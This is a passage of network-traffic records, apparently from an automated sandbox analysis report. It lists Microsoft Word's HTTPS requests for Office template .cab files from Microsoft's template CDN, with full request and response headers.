    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 22008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: q78QzulIDkHYEnfpU4+Yyw==
    Last-Modified: Fri, 22 Apr 2016 15:41:56 GMT
    ETag: 0x8D36AC4A2F6A8CC
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ff55c4dd-c01e-0039-0797-a078cd000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851217.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 33610
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
    Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
    ETag: 0x8D36AC881987151
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 5c89f3d8-e01e-00a6-4d97-a03d34000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851222.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 28911
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: bXh7HiI9trkbaSOAYsyocg==
    Last-Modified: Fri, 22 Apr 2016 16:09:41 GMT
    ETag: 0x8D36AC8830E54C8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a51313b9-e01e-0100-5597-a07427000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851218.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31835
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: kqgZ1DSoquosZfDMLzO7Og==
    Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
    ETag: 0x8D36AC4998BC504
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 76eac56c-801e-00f9-0d97-a0f289000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp1000111502.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 230916
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: k/qfd5Ugqy0irE6oZLe7NA==
    Last-Modified: Thu, 12 Jul 2018 00:23:55 GMT
    ETag: 0x8D5E78DC0BDFFD8
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 4fca6d0a-e01e-006a-5297-a064c2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851224.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 30957
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 08kDbk4RWegysbTS6dQr8A==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A7FC9DF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 8e392da6-d01e-010b-4f97-a06648000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 222992
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
    Last-Modified: Wed, 29 Aug 2018 18:20:49 GMT
    ETag: 0x8D60DDC25D3B258
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2dfc7fe2-b01e-0132-7897-a026ec000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851223.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 32833
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: IFr1FgTvlu8ejmAhJUH3Qg==
    Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
    ETag: 0x8D36AC49A4270D3
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: a445c8ca-501e-00f0-1697-a0e807000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851226.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 35519
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: U+6dpJ0LhDVwOOzzdoONLg==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC88440C433
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2e8ae1bb-901e-00ce-4f97-a05ba4000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851225.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31008
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4DPMvHunh6L4JM4JUuV9RA==
    Last-Modified: Fri, 22 Apr 2016 16:09:42 GMT
    ETag: 0x8D36AC883F49D7D
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 333d895c-301e-008a-7b97-a0d19b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02851227.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31471
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: karb7EFxz6gpK2GEkvXvNA==
    Last-Modified: Fri, 22 Apr 2016 16:09:43 GMT
    ETag: 0x8D36AC8848A0495
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 13033484-101e-00ef-6b97-a07fdf000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 307348
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: DrxFqg5nzENdB0VDg3H5SA==
    Last-Modified: Wed, 29 Aug 2018 18:20:24 GMT
    ETag: 0x8D60DDC16D93762
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6b95f26a-601e-0143-7d97-a0927b000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp02835233.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 46413
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
    Last-Modified: Fri, 22 Apr 2016 15:41:34 GMT
    ETag: 0x8D36AC4959B7E4C
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 2ef43144-a01e-0126-5097-a0e588000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1065873
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
    Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
    ETag: 0x8D60DDB6BA6E455
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 035d76e5-001e-0155-6297-a064ac000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0309043402.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 723359
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: dIpTxr3Vzpe9VKdsejNChg==
    Last-Modified: Wed, 29 Aug 2018 18:14:28 GMT
    ETag: 0x8D60DDB424DEB76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 6df36025-a01e-0066-4397-a08a33000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328905.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20457
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: TvpI7DB+ry+bNGoHPGf8+w==
    Last-Modified: Fri, 22 Apr 2016 16:09:46 GMT
    ETag: 0x8D36AC886167DDF
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 66a5b05a-401e-0074-0597-a0beda000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0403392901.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 1766185
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: go+WAx9Av468teUqrut+TA==
    Last-Modified: Wed, 29 Aug 2018 18:21:39 GMT
    ETag: 0x8D60DDC4354B7FB
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: ec9a4660-301e-00c7-1297-a01e77000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328893.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 20235
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
    Last-Modified: Fri, 22 Apr 2016 15:41:57 GMT
    ETag: 0x8D36AC4A3175138
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 3d2d7caf-b01e-0050-2697-a02761000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328908.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 31083
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: iamBjmZY1zpztkJSL/hwHw==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC498DE687B
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: c5200cc9-a01e-00a1-5597-a0f6f2000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328916.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 26944
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
    Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
    ETag: 0x8D36AC49908AE11
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: b597306b-e01e-00c0-6697-a0b22d000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 261258
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
    Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
    ETag: 0x8D60DDC968C4F0E
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Mon, 20 May 2024 12:37:56 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    GET
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
    WINWORD.EXE
    Remote address:
    2.17.251.23:443
    Request
    GET /support/templates/en-us/tp03328919.cab HTTP/1.1
    Connection: Keep-Alive
    Accept-Encoding: gzip
    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
    X-IDCRL_ACCEPTED: t
    X-Office-Version: 16.0.12527
    X-Office-Application: 0
    X-Office-Platform: Win32
    X-Office-AudienceGroup: Production
    X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
